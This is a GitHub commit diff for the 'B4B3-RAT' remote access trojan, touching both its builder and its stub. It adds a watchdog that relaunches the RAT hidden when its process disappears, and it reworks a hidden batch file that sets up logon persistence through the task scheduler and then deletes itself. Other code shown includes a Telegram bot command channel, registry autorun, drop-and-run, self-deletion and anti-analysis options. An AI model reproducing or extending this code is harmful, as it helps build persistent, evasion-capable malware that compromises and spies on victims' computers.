Added function spy process #8

4B4DB4B3 · May 30, 2021 · 7a5d222 · 7a5d222
1 parent 2bd57a0
commit 7a5d222
Show file tree

Hide file tree

Showing 13 changed files with 367 additions and 291 deletions.
diff --git a/B4B3-RAT/Builder/Builder.cpp b/B4B3-RAT/Builder/Builder.cpp
@@ -41,17 +41,19 @@ BOOL Builder::MakeFile(const char* stub, const char* output, Builder::Settings*
 
 	f_out.write((char*)&s->chatid, sizeof(s->chatid));
 	f_out.write((char*)&s->drop, sizeof(s->drop));
-	f_out.write((char*)&s->drop_run, sizeof(bool));
+	f_out.write((char*)&s->drop_run, sizeof(s->drop_run));
 
 	f_out.write((char*)&s->scheduler_name, sizeof(s->scheduler_name));
-	f_out.write((char*)&s->scheduler_state, sizeof(bool));
+	f_out.write((char*)&s->scheduler_state, sizeof(s->scheduler_state));
 
 	f_out.write((char*)&s->client_delay, sizeof(s->client_delay));
 	f_out.write((char*)&s->autorun, sizeof(s->autorun));
-	f_out.write((char*)&s->autorun_state, sizeof(bool));
+	f_out.write((char*)&s->autorun_state, sizeof(s->autorun_state));
 
-	f_out.write((char*)&s->auto_delete, sizeof(bool));
-	f_out.write((char*)&s->protector, sizeof(bool));
+	f_out.write((char*)&s->auto_delete, sizeof(s->auto_delete));
+	f_out.write((char*)&s->protector, sizeof(s->protector));
+
+	f_out.write((char*)&s->protectorName, sizeof(s->protectorName));
 
 	f_out.close();
 

diff --git a/B4B3-RAT/Builder/Builder.h b/B4B3-RAT/Builder/Builder.h
@@ -37,15 +37,17 @@ namespace Builder {
 		char drop[128] = { 0 };
 		bool drop_run;
 
-		char scheduler_name[128] = { 0 };
+		char scheduler_name[50] = { 0 };
 		bool scheduler_state;
 
 		char autorun[128] = { 0 };
 		bool autorun_state;
 
-		char client_delay[128] = { 0 };
+		char client_delay[10] = { 0 };
 		bool auto_delete;
+
 		bool protector;
+		char protectorName[50] = { 0 };
 	};
 	#pragma pack(pop)
 

diff --git a/B4B3-RAT/Builder/Builder.rc b/B4B3-RAT/Builder/Builder.rc
@@ -50,7 +50,7 @@ END
 // Dialog
 //
 
-IDD_DIALOGBAR DIALOGEX 0, 0, 277, 259
+IDD_DIALOGBAR DIALOGEX 0, 0, 277, 277
 STYLE DS_SETFONT | DS_3DLOOK | DS_FIXEDSYS | DS_CENTERMOUSE | WS_POPUP | WS_BORDER
 FONT 8, "MS Shell Dlg", 400, 0, 0x0
 BEGIN
@@ -63,22 +63,24 @@ BEGIN
     EDITTEXT        IDC_EDIT1,113,31,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
     EDITTEXT        IDC_EDIT2,113,45,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
     EDITTEXT        IDC_EDIT3,113,60,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
-    CTEXT           "Make my RAT",IDC_STATIC3,8,225,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
-    LTEXT           "Enter the drop path:",IDC_STATIC,19,168,67,8
-    EDITTEXT        IDC_EDIT4,113,167,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
+    CTEXT           "Make my RAT",IDC_STATIC3,8,240,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
+    LTEXT           "Enter the drop path:",IDC_STATIC,19,186,67,8
+    EDITTEXT        IDC_EDIT4,113,185,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
     LTEXT           "Client delay (m/s):*",IDC_STATIC,8,77,67,8
     EDITTEXT        IDC_EDIT5,113,76,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
-    CONTROL         "Auto delete yourself before run",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,185,118,10
-    CONTROL         "Write yourself in autorun",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,93,97,10
-    LTEXT           "Enter the name in autorun:",IDC_STATIC,19,106,90,8
-    EDITTEXT        IDC_EDIT6,113,105,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
+    CONTROL         "Auto delete yourself before run",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,203,118,10
+    CONTROL         "Write yourself in autorun",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,111,97,10
+    LTEXT           "Enter the name in autorun:",IDC_STATIC,19,124,90,8
+    EDITTEXT        IDC_EDIT6,113,123,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
     CONTROL         "Drop and run yourself from [DROP PATH]",IDC_CHECK3,
-                    "Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,153,151,10
-    CONTROL         "Anti-debuggers, anti-analysis",IDC_CHECK4,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,203,111,10
-    CTEXT           "Test BOT API (Show commands)",IDC_STATIC4,137,225,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
-    CONTROL         "Write yourself in task scheduler",IDC_CHECK5,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,122,119,10
-    LTEXT           "Enter the name in taskschd:",IDC_STATIC,19,136,92,8
-    EDITTEXT        IDC_EDIT7,113,135,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
+                    "Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,171,151,10
+    CONTROL         "Anti-debuggers, anti-analysis",IDC_CHECK4,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,221,111,10
+    CTEXT           "Test BOT API (Show commands)",IDC_STATIC4,137,240,129,28,SS_NOTIFY | SS_CENTERIMAGE,WS_EX_STATICEDGE
+    CONTROL         "Write yourself in task scheduler",IDC_CHECK5,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,8,140,119,10
+    LTEXT           "Enter the name in taskschd:",IDC_STATIC,19,154,92,8
+    EDITTEXT        IDC_EDIT7,113,153,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
+    LTEXT           "Enter spy process name:",IDC_STATIC,8,94,82,8
+    EDITTEXT        IDC_EDIT8,113,93,153,12,ES_AUTOHSCROLL | NOT WS_BORDER,WS_EX_STATICEDGE
 END
 
 
@@ -97,6 +99,7 @@ BEGIN
         VERTGUIDE, 113
         VERTGUIDE, 137
         VERTGUIDE, 266
+        BOTTOMMARGIN, 268
         HORZGUIDE, 16
         HORZGUIDE, 31
         HORZGUIDE, 253

diff --git a/B4B3-RAT/Builder/DlgProc.cpp b/B4B3-RAT/Builder/DlgProc.cpp
@@ -80,21 +80,22 @@ INT_PTR DlgProc::DlgMain(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
 				case IDC_STATIC3:
 				{
 					Builder::Settings s;
-					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT1), s.botapi, 127);
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT1), s.botapi, (sizeof(s.botapi) - 1));
 
 					strcpy(s.key, Manager::RandomStr(CryptoPP::AES::DEFAULT_KEYLENGTH).c_str());
 					strcpy(s.botapi, Manager::EncryptStr(s.botapi, s.key).c_str());
 
-					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT2), s.chatid, 127);
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT2), s.chatid, (sizeof(s.chatid) - 1));
 
 					INT TextLen = GetWindowTextLengthA(GetDlgItem(hWnd, IDC_EDIT3)) + 1;
 					char* buff = new char[TextLen];
 					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT3), buff, TextLen);
 
-					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT4), s.drop, 127);
-					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT5), s.client_delay, 127);
-					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT6), s.autorun, 127);
-					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT7), s.scheduler_name, 127);
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT4), s.drop, (sizeof(s.drop) - 1));
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT5), s.client_delay, (sizeof(s.client_delay) - 1));
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT6), s.autorun, (sizeof(s.autorun) - 1));
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT7), s.scheduler_name, (sizeof(s.scheduler_name) - 1));
+					GetWindowTextA(GetDlgItem(hWnd, IDC_EDIT8), s.protectorName, (sizeof(s.protectorName) - 1));
 
 					UINT State = SendMessage(GetDlgItem(hWnd, IDC_CHECK1), BM_GETCHECK, 0, 0);
 					if (State == BST_CHECKED) {

diff --git a/B4B3-RAT/Builder/resource.h b/B4B3-RAT/Builder/resource.h
@@ -19,6 +19,7 @@
 #define IDC_CHECK4                      1014
 #define IDC_CHECK5                      1015
 #define IDC_EDIT7                       1016
+#define IDC_EDIT8                       1017
 
 // Next default values for new objects
 // 

diff --git a/B4B3-RAT/Stub/Information.cpp b/B4B3-RAT/Stub/Information.cpp
@@ -29,7 +29,7 @@ std::string Information::GetOS() {
     OSVERSIONINFO vi;
     vi.dwOSVersionInfoSize = sizeof(vi);
     if (GetVersionEx(&vi) == 0) 
-        return "Error getting ";
+        return "Unknown OS";
 
 	if (vi.dwMajorVersion == 10 && vi.dwMinorVersion == 0) {
 		return "Windows 10";

diff --git a/B4B3-RAT/Stub/Manager.cpp b/B4B3-RAT/Stub/Manager.cpp
@@ -39,17 +39,19 @@ void Manager::ReadData(Settings* s) {
 
 	stub.read((char*)&s->chatid, sizeof(s->chatid));
 	stub.read((char*)&s->drop, sizeof(s->drop));
-	stub.read((char*)&s->drop_run, sizeof(bool));
+	stub.read((char*)&s->drop_run, sizeof(s->drop_run));
 
 	stub.read((char*)&s->scheduler_name, sizeof(s->scheduler_name));
-	stub.read((char*)&s->scheduler_state, sizeof(bool));
+	stub.read((char*)&s->scheduler_state, sizeof(s->scheduler_state));
 
 	stub.read((char*)&s->client_delay, sizeof(s->client_delay));
 	stub.read((char*)&s->autorun, sizeof(s->autorun));
-	stub.read((char*)&s->autorun_state, sizeof(bool));
+	stub.read((char*)&s->autorun_state, sizeof(s->autorun_state));
 
-	stub.read((char*)&s->auto_delete, sizeof(bool));
-	stub.read((char*)&s->protector, sizeof(bool));
+	stub.read((char*)&s->auto_delete, sizeof(s->auto_delete));
+
+	stub.read((char*)&s->protector, sizeof(s->protector));
+	stub.read((char*)&s->protectorName, sizeof(s->protectorName));
 
 	stub.close();
 }
@@ -65,14 +67,13 @@ void Manager::Autorun(const char* path, const char* name) {
 }
 
 void Manager::Scheduler(const char* path, const char* name) {
-	std::ofstream schd("scheduler.bat");
+	std::ofstream schd(BAT_SCHD);
 	schd << "@echo off \n";
 	schd << "SCHTASKS /CREATE /SC ONLOGON /TN \"" + std::string(name) + "\" /TR \"" + std::string(path);
+	schd << "DEL" BAT_SCHD;
 	schd.close();
 
-	ShellExecuteA(0, "open", "scheduler.bat", 0, 0, SW_HIDE);
-	Sleep(2000);
-	DeleteFileA("scheduler.bat");
+	ShellExecuteA(0, "open", BAT_SCHD, 0, 0, SW_HIDE);
 }
 
 long Manager::GetFileSize(const char* filename) {

diff --git a/B4B3-RAT/Stub/Manager.h b/B4B3-RAT/Stub/Manager.h
@@ -27,6 +27,10 @@ SOFTWARE.
 #define MANAGER_H
 #include "common.h"
 
+#define BAT_EXTERNAL "RunExternal.bat"
+#define BAT_SCHD "C:\\Users\\scheduler.bat"
+#define BAT_AUTODEL "C:\\Users\\system.bat"
+
 namespace Manager {
 	#pragma pack(push, 1)
 	struct Settings {
@@ -37,15 +41,17 @@ namespace Manager {
 		char drop[128] = { 0 };
 		bool drop_run;
 
-		char scheduler_name[128] = { 0 };
+		char scheduler_name[50] = { 0 };
 		bool scheduler_state;
 
 		char autorun[128] = { 0 };
 		bool autorun_state;
 
-		char client_delay[128] = { 0 };
+		char client_delay[10] = { 0 };
 		bool auto_delete;
+
 		bool protector;
+		char protectorName[50] = { 0 };
 	};
 	#pragma pack(pop)
 
@@ -57,7 +63,6 @@ namespace Manager {
 	long GetFileSize(const char* filename);
 	bool FileExists(std::string name);
 
-	std::string ToLower(std::string str);
 	std::vector<std::string> split(std::string str, char delim);
 
 	std::string EncryptStr(std::string text, std::string key);

diff --git a/B4B3-RAT/Stub/Protector.cpp b/B4B3-RAT/Stub/Protector.cpp
@@ -83,4 +83,30 @@ void Protector::AntiProcesses() {
 		}
 		Sleep(3000);
 	}
-}
+}
+
+void Protector::SpyProcess(_SpyProcess* SP) {
+	HANDLE hSnap = NULL;
+	PROCESSENTRY32 pe32;
+	pe32.dwSize = sizeof(PROCESSENTRY32);
+
+	std::string process = "";
+	while (true) {
+		bool founded = false;
+		hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+		if (hSnap != NULL) {
+			if (Process32First(hSnap, &pe32)) {
+				do {
+					if (std::string(pe32.szExeFile).find(SP->procName) != std::string::npos) {
+						founded = true;
+					}
+				} while (Process32Next(hSnap, &pe32));
+			}
+		}
+
+		if (!founded)
+			ShellExecuteA(0, "open", SP->procPath, "protected", 0, SW_HIDE);
+
+		Sleep(1000);
+	}
+}
diff --git a/B4B3-RAT/Stub/Protector.h b/B4B3-RAT/Stub/Protector.h
@@ -29,6 +29,13 @@ SOFTWARE.
 
 namespace Protector {
 	void AntiProcesses();
+
+	struct _SpyProcess {
+		char* procName;
+		char* procPath;
+	};
+
+	void SpyProcess(_SpyProcess* SP);
 }
 
 #endif